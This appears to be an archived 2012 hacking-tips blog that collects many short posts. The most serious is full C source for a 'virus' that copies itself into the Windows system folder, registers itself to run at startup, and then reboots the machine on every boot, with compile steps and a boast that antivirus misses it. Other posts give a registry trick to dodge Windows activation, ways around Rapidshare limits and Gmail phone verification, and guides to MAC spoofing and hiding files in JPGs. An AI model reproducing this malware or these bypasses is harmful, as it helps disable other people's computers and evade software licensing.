Friday, June 8, 2012

How to use windows 7 without activation

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.



2. Now type the following command and hit enter

slmgr -rearm
 
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.

4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.

6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit +                                                                                                                                                                
240 days using “slmgr -rearm” command after registry edit
 =      360 Days

C virus to restart computer at boot


Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System
(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

how to compile C programs


In many of my following posts especially in the VIRUS CREATION section, I will use C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
 

How to install Borland C++ compiler

 
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
 

How to configure Borland C++ compiler

 
1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt tobcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document (2).txt toilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Binand paste them.
 

How to compile the C source code (.C files)

 
1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
Command to Compile C Program
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file). 
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

Monday, June 4, 2012

disable root in ubuntu

Re-disabling your root account

IconsPage/info.png
If for some reason you have enabled your root account and wish to disable it again, use the following command in terminal...
IconsPage/info.png
sudo passwd -dl root

enable root in ubuntu

root account

Enabling the root account

IconsPage/IconWarning3.png
Enabling the Root account is rarely necessary. Almost everything you need to do as administrator of an Ubuntu system can be done via sudo or gksudo. If you really need a persistent Root login, the best alternative is to simulate a Root login shell using the following command...
IconsPage/IconWarning3.png
sudo -i
To enable the Root account (i.e. set a password) use:
sudo passwd root
Use at your own risk!
IconsPage/dont.png
Logging in to X as root may cause very serious trouble. If you believe you need a root account to perform a certain action, please consult the official support channels first, to make sure there is not a better alternative.
IconsPage/dont.png

Sunday, June 3, 2012

make bootable pendrive

WinToFlash starts a wizard that will help pull over the contents of a windows installation CD or DVD and prep the USB drive to become a bootable replacement for the optical drive. It can also do this with your LiveCD.You don't have to worry about scratches on the disc or misplacing your original media discs once you transfer their contents to the flash drive. The optical drive is quickly becoming a thing of the past, especially in office environments, as media is shifted to the cloud.
Download Win2flash

bypass google two step verification

of all go to www.k7.net/ and sign up there. This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone no. of US.

Step 2. Now go for creating account on gmail, enter all the information as you want, but in Location fill 'United States'.

Step 3. Now click on 'I accept, create an account'.

Step 4. Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from http://www.k7.net/

Step 5. Now you will get a mail having verification code as voice mail on that account from which you have registered on . Open it, download the attachment file and listen the code http://www.k7.net/

Step 6. Now enter the code of your voice mail in verification code. and click OK.Your account is ready now :)

ReBOOt trailer :- upcoming hacker movie


Friday, June 1, 2012

change mac address in linux


How To Perform The Attack:
The tool we will be using is "macchanger". First you will need to install it.

Code:
apt-get install macchanger
or
Code:
yum install macchanger

First because we cannot change the mac address on an active card we need to run
Code:
ifconfig wlan0 down
You will leave it down until after the mac address as been changed.

To view the list of options for this tool you can run
Code:
macchanger --help
To view a list of available commands for this application.
[Image: screenshot3ij.jpg]

If you are looking to spoof a specific device you can get the prefix for the mac address from the link I provided above or by running the command
Code:
macchanger -l

So if you wanted to to spoof say a cisco device you would do
Code:
macchanger -m 00:e0:f9:52:72:f6 wlan0
Wlan0 would be the device in which your trying to spoof the mac for.
If successful we will see
[Image: screenshot5jx.jpg]
Then after this you would run
Code:
ifconfig wlan0 up

If you are not bothered about specifying your mac address as a specific device you can run
Code:
macchanger -a
Which will select a random vendor and spoof it
or
Code:
macchanger -r
Which won't focus on vendors and just randomly set the mac address

I hope this was informal, if you have any questions feel free to ask.

lock folder using notepad


Open Notepad from your Start -> All Programs -> Accessories -> Notepad


Step 1: Open notepad and copy and paste in this code


Step 2: Once the code in notepad save it as "FloderLock.bat"
[Image: folderlockb.png]

Step 3: You should now have a .bat file called "Folderlock" double click on it and within a second a new folder called "Locker" Should have been created. Now drop all the files you want like to lock away in "Locker"
[Image: folderlock2.png]

Step 4: When you've gotten all the files you want into lock away in "Locker" now to lock it, double click on "FolderLock.bat" and type "Y" when the command prompt comes up. Your folder will now be locked and will disappear.
[Image: folderlock3.png]

Step 5: To unlock the folder click on "FolderLock.bat' when the command prompt comes up type "Y". The folder "Locker" and all it's documents should be back in the same directory as "FolderLock"

hide files in a jpg image or a file

How to:
Hide files in a jpg

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

Steps:
1. Save the picture of choice to your desktop.
2. Make a new .rar or .zip folder on your desktop.
3. Add the files you want to hide into the .zip or .rar
4. Click start menu, run, cmd.
5. In Command Prompt type cd “desktop” with the quotation marks.
6. Now type in copy /b picturename.jpg + foldername.rar outputfilename.jpg
( If you use .zip then: copy /b picturename.jpg + foldername.zip outputfilename.jpg)
7. Now there should be the outputed file name with a .jpg extension on the desktop.
( Do not close Command Prompt just yet )
8. Double click it to open the picture and check it out.
9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you’re done!

Bypass Rapidshare waiting time



Rapid Hacker v3.0 (Final) | 1.44 MB
Tested and Working - No more download limit !!! Rapid Hacker can hack / crack / bypass waiting limit at Rapidshare.com and Rapidshare.de Just copy-paste the Rapidshare link and get unlimited downloads.
Spyware and Virus Free.

INSTRUCTIONS :
? paste the rapidshare link
? click "Go"
? Click the "FREE" button on the Rapidshare's page
Just copy/paste rapidshare site and get unlimited downloads.
:: After you paste the rapidshare link, click "Go"
:: Click on the Rapidshare page, press tab 14 times
:: hit enter if you can't scroll to the free button

Download Now

Source

Ultrasurf 8.9

"Browse the world without any limit for free with safety" New revolution in the field of proxy, simple to use and faster. No more slot limitations, time limits, geographical limits, bandwidth problems in same old proxies. Switch to UltraSurf 8.9


UltraSurf is the flagship software product from UltraReach Internet Corp. for Internet anti-censorship. It enables users inside countries with heavy Internet censorship to visit any public web sites in the world safely and freely.
As the safety and convenience of the users is our first priority, the most prominent features of UltraSurf 8 are that it has implemented a complex proxy with complete transparency and a high level of encryption on the Microsoft Internet Explorer (IE) platform. UltraSurf 8 enables users to browse any website freely just the same as using the regular IE browser while it automatically searches the highest speed proxy servers in the background.
UltraSurf 8 implements almost all browser functions based on HTTP and user needs, such as browsing websites, login and posting on web forums, using Web mail, uploading and downloading data files, real time audio, video and other multimedia programs, etc. Please refer to the “UltraSurf 8 Users Guide” for detailed information.
UltraSurf 8 is a green software, which means no installation process is needed nor system setting is required to change when using the software. It is simply an executable on Windows platform.

Download the UltraSurf 8 client software now

[Download]

Download the UltraSurf 6 User Guide in English at:
http://www.wujie.net/downloads/ultrasurf/UltraSurf6_userGuide_en.zip
Note: The English version is for ultrasurf 6. You may use it as the reference for current version ultrasurf 8.







Disadvantages:

Cannot be used with Firefox, so Firefox users you have to use same old proxies....

Download Install Android Emulator

In this tutorial we are going to learn how to install any given Android application in Android emulator. i will help you to setup the android 1.1 and 1.5 emulator.You must have java installed on your machine before installing the Android emulator.

Install Java from here: Go to java.com and install to java.

If you already installed java or recently then you must know that the version of Java installed on your machine is correct or not.

Test installed java from here: Go java.com to check whether you have correct version of java installed or not. If you fine that correct version is not installed then follow the instruction provided in page and install the correct version of java.

After completion of java installation successfully follow below steps to install the Android emulator.


Download the android emulator

Android emulator comes with Android sdk.You can download latest sdk from:android.com

How to install android emulator

Downloaded android sdk will be in compressed format.Uncompressed it to the desired location [e.g. C:\Emulator]and you are done.

Android sdk commands for emulator

Launch the command prompt: Start>Run>Cmd.Locate the emulator.exe path where the android got installed, in this case go to C:\Emulator directory and navigate to tools directory e.g:C:\Emulator\Android\android-sdk-windows-1.5_r2\tools where emulator.exe is present.Navigate to tools directory path in command prompt like shown below.

Type: Emulator.exe -help and execute it. You will find the list of the useful commands related to emulator usage.

* Type: Android -h and execute it. You will find the list of the useful commands related to Android usage.

Android virtual device

Android virtual device is the emulator that we are going to create based on the specific platform of android
.E.g. Android1.1, Abdroid1.5, Android2.0 etc.

* Type: Emulator.exe -help-virtual-device and execute it for more information about android virtual device.

Setup the Android virtual device

This is the command format to create the android virtual device: android create avd -n [UserDefinedNameHere] -t [1 or 2 or 3 etc. based on which android platform you want to create]

* If you want to create android virtual device based on Android1.1 platform then type:android create avd -n MyAndroid1 -t 1
* If you want to create android virtual device based on Android1.5 platform then type:android create avd -n MyAndroid2 -t 2
* After executing one of the above command you will be prompted for the message like below to create custom hardware profile. Type no if you don't want to create custom hardware profile.

* Now after successful setup of android virtual device you will be prompted message like this depending on what platform android virtual device is created:"Created AVD 'MyAndroid1' based on Android1.1 or Created AVD 'MyAndroid2' based on Android1.5"

List of created android virtual devices

Type: Android list avd : This command will display the list of the created android virtual devices as shown in below screen shot.

Launch created android virtual device or emulator

A: Type:emulator.exe -avd [name of the emulator created] : In our case type:emulator.exe -avd MyAndroid1 or emulator.exe -avd MyAndroid2

Now you can see the emulator launched as below. Wait some time to get it initialized , ignore any error message if it appears if it is not blocking,It will also get the Internet connection automatically so you do not need to do anything to surf Internet in emulator. Now you are ready to start you application on emulator !

make bootable pendrive

WinToFlash starts a wizard that will help pull over the contents of a windows installation CD or DVD and prep the USB drive to become a bootable replacement for the optical drive. It can also do this with your LiveCD.You don't have to worry about scratches on the disc or misplacing your original media discs once you transfer their contents to the flash drive. The optical drive is quickly becoming a thing of the past, especially in office environments, as media is shifted to the cloud.
Download Win2flash




Courtesy :- Mr Rahul Tyagi

bypass Antivirus software by vikrant saini

bypass any antivirus software



Courtesy:- Mr vikrant saini

Spoof Mac address

Most people among us change their IP address and think they are anonymous on internet but one thing they forgot that they can be tracked down with MAC address which is still there non spoofed. So what to do then? Its practically impossible to change your MAC address but yes virtually its possible :). Here is a application called SMAC that can help you to spoof your MAC address to maintain your anonymity on internet.

SMAC is a powerful, yet an easy-to-use and intuitive Windows MAC Address Modifying Utility (MAC Address spoofing) which allows users to change MAC address for almost any Network Interface Cards (NIC) on the Windows VISTA, XP, 2003, and 2000 systems, regardless of whether the manufacturers allow this option or not.

SMAC does not change the hardware burned-in MAC addresses.  SMAC changes the "software based" MAC addresses, and the new MAC addresses you change will sustain from reboots.SMAC helps people to protect their privacy by hiding their real MAC Addresses in the widely available wifi Wireless Network.  SMAC also helps Network and IT Security professionals to troubleshoot network problems, test Intrusion Detection / Prevention Systems (IDS/IPS,) test Incident Response plans, build high-availability solutions, recover (MAC Address based) software licenses, and etc...


Download SMAC  




Courtesy:- Mr Rahul Tyagi.. 

How to search google via sms

Yeah, now you can also search anything, anytime, anywhere on Google without a internet connection. Google on your mobile either it’s a Smartphone or low cost phone it will help you with his SMS service. You don’t need to buy a expensive phone’s out of your budget to just surf for internet on the go.

Please follow the following step:-

1.  You have to just type your keywords (You want to search) in your phone message box (create message).


2.Then add receipt send it to 9773300000. And it will comeback you the answer within a few seconds.

3.  You will  feel like you are surfing Google on the Internet.


Note:- Service charges may/may not apply....

Script Kiddie

A person, normally someone who is not technologically sophisticated, who randomly seeks out a specific weakness over the Internet in order to gain root access to a system without really understanding what it is s/he is exploiting because the weakness was discovered by someone else. A script kiddie is not looking to target specific information or a specific company but rather uses knowledge of a vulnerability to scan the entire Internet for a victim that possesses that vulnerability.

Grey hats

A grey hat, in the hacking community, refers to a skilled hacker whose activities fall somewhere between white and black hat hackers on a variety of spectra. It may relate to whether they sometimes arguably act illegally, though in good will, or to show how they disclose vulnerabilities. They usually do not hack for personal gain or have malicious intentions, but may be prepared to technically commit crimes during the course of their technological exploits in order to achieve better security. Whereas white hat hackers will tend to advise companies of security exploits quietly, grey hat hackers are prone to "advise the hacker community as well as the vendors and then watch the fallout".

White Hats

The term "white hat" in Internet slang refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.[1] Ethical hacking is a term coined by IBM meant to imply a broader category than just penetration testing.White-hat hackers are also called "sneakers", red teams, or tiger teams.An explanation in simpler more understandable terms, is a hacker, who is hacking for the purpose of improving internet security.

Top 12 White Hat Hackers :- http://www.networkworld.com/slideshows/2010/041510-white-hat-hackers.html

Black Hats

A Black Hat Hacker is a hacker who "violates computer security for little reason beyond maliciousness or for personal gain". Black Hat Hackers form the stereotypical, illegal hacking groups often portrayed in popular culture, and are "the epitome of all that the public fears in a computer criminal". Black Hat Hackers break into secure networks to destroy data or make the network unusable for those who are authorized to use the network. They choose their targets using a two-pronged process known as the "pre-hacking stage."
These people are cyber criminals and do most of the illegal things going on the internet..

Top 10 Black-hat hackers :-http://www.focus.com/fyi/top-10-most-famous-hackers-all-time/

HACKER !!! ?????

An Hacker is an individual with some very good knowledge about the  compuer's Software and Hardware.

These people breakdown the security with there exceptional knowledge. There main intention is to do illegal things..

Most hackers do it for fun and to hang around ..